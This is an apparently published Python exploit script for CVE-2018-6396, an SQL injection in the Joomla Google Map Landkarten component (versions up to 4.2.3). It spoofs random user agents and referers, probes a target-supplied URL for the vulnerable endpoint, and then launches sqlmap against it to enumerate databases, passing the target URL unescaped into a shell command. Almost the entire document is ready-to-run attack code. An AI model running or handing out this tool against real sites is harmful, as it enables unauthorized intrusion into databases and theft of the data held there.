README.md
Rendering markdown...
#!/usr/bin/python3
#IMPORTS
import os
import sys
import random
import requests
import argparse
#CLASS
class Colors:
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
WHITE = '\033[37m'
#Class from https://raw.githubusercontent.com/ankayip41/random-user-agent/master/ua.py
class UserAgent:
agent = {}
def random(self):
self.get_platform()
self.get_os()
self.get_browser()
if self.agent['browser'] == 'Chrome':
webkit = str(random.randint(500, 599))
version = "%s.0%s.%s"%(str(random.randint(0, 24)), str(random.randint(0, 1500)), str(random.randint(0, 999)))
return "Mozilla/5.0 (%s) AppleWebKit/%s.0 (KHTML, like Gecko) Chrome/%s Safari/%s"%(self.agent['os'], webkit, version, webkit)
elif self.agent['browser'] == 'Firefox':
year = str(random.randint(2000, 2015))
month = str(random.randint(1, 12)).zfill(2)
day = str(random.randint(1, 28)).zfill(2)
gecko = "%s%s%s"%(year, month, day)
version = "%s.0"%(str(random.randint(1, 15)))
return "Mozilla/5.0 (%s; rv:%s) Gecko/%s Firefox/%s"%(self.agent['os'], version, gecko, version)
elif self.agent['browser'] == 'IE':
version = "%s.0"%(str(random.randint(1, 10)))
engine = "%s.0"%(str(random.randint(1, 5)))
option = random.choice([True, False])
if option:
token = "%s;"%(random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']))
else:
token = ''
return "Mozilla/5.0 (compatible; MSIE %s; %s; %sTrident/%s)"%(version, self.agent['os'], token, engine)
def get_os(self):
if self.agent['platform'] == 'Machintosh':
self.agent['os'] = random.choice(['68K', 'PPC'])
elif self.agent['platform'] == 'Windows':
self.agent['os'] = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE'])
elif self.agent['platform'] == 'X11':
self.agent['os'] = random.choice(['Linux i686', 'Linux x86_64'])
def get_browser(self):
self.agent['browser'] = random.choice(['Chrome', 'Firefox', 'IE'])
def get_platform(self):
self.agent['platform'] = random.choice(['Machintosh', 'Windows', 'X11'])
#GLOBAL VARS
UA = UserAgent()
HOST = ""
URL = ""
ARGS = ""
P = "/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=1"
#FUNCTIONS
def banner():
os.system("clear")
print(Colors.BLUE + Colors.BOLD +
"""
_______ _______ ______ __ __ ______ _______ _______ _______ _______ _______
| | | _ | | |/ | __ \ | | | |_ _| ___| __|
| | | ---| <| __/ | | | | | | ___|__ |
|___|___|___|___|______|__|\__|___| |_______|__|____| |___| |_______|_______|
==================[ Javier Olmedo - [email protected] ]==================
https://hackpuntes.com
https://twitter.com/jjavierolmedo
[03/03/2018]
Discovered by: @ihsansencan
Joomla! Component Google Map Landkarten <= 4.2.3 - SQL Injection
Exploit CVE-2018-6396
""" + Colors.ENDC)
def usage():
print("""
EXAMPLE:
-u [REQUIRED] Specify the URL of the target to attack
python3 joomla-cve-2018-6396.py -u <TARGET>
""")
def parserArguments():
global ARGS
parser = argparse.ArgumentParser()
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
required.add_argument("-u", help="specify the URL of the target to attack")
ARGS = parser.parse_args()
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def isVulnerable():
global HOST
global UA
global URL
global P
formatTarget()
headers = {
'User-Agent': UA.random(),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
URL = HOST + P
r = requests
print(Colors.BOLD + Colors.GREEN + "[+]" + " Checking if " + Colors.YELLOW + HOST + Colors.GREEN + " is vulnerable" + Colors.ENDC)
try:
r = requests.get(URL, headers=headers, timeout=10)
except Exception as e:
r.status_code = 500
pass
if(r.status_code == 200):
return True
else:
return False
def formatTarget():
global HOST
if(HOST[-1:] == "/"):
HOST = HOST[:-1]
if(HOST[:7] != "http://" or HOST[:8] != "https://"):
option = True
print(Colors.BOLD + Colors.GREEN + "[1]" + Colors.YELLOW + " http://" + HOST + Colors.ENDC)
print(Colors.BOLD + Colors.GREEN + "[2]" + Colors.YELLOW + " https://" + HOST + Colors.ENDC)
print()
while option:
myTarget = input(Colors.BOLD + Colors.YELLOW + "[!]" + Colors.WHITE + " Select your " + Colors.RED + "TARGET: " + Colors.GREEN)
if(myTarget == "1"):
HOST = "http://" + HOST
option = False
elif(myTarget == "2"):
HOST = "https://" + HOST
option = False
else:
sys.stdout.write("\033[F")
sys.stdout.write("\033[K" + Colors.ENDC)
print()
#MAIN
if __name__ == "__main__":
banner()
usage()
parserArguments()
if(ARGS.u):
HOST = ARGS.u
if(isVulnerable()):
print(Colors.BOLD + Colors.GREEN + "[+]" + " TARGET " + Colors.YELLOW + HOST + Colors.GREEN + " VULNERABLE!! :)" + Colors.ENDC)
print()
print(Colors.BOLD + Colors.GREEN + "[+]" + " LAUNCHING ATTACK SQLi with SQLmap!!" + Colors.ENDC)
c = 'sqlmap -u "'+URL+'" -p map --dbs'
os.system(c)
else:
print(Colors.BOLD + Colors.RED + "[-]" + " TARGET " + Colors.YELLOW + HOST + Colors.RED + " NOT VULNERABLE!! :(" + Colors.ENDC)
print()
sys.exit(1)
else:
print(Colors.BOLD + Colors.RED + "[!] " + "Arguments not found!!" + Colors.ENDC)
print("")
sys.exit(1)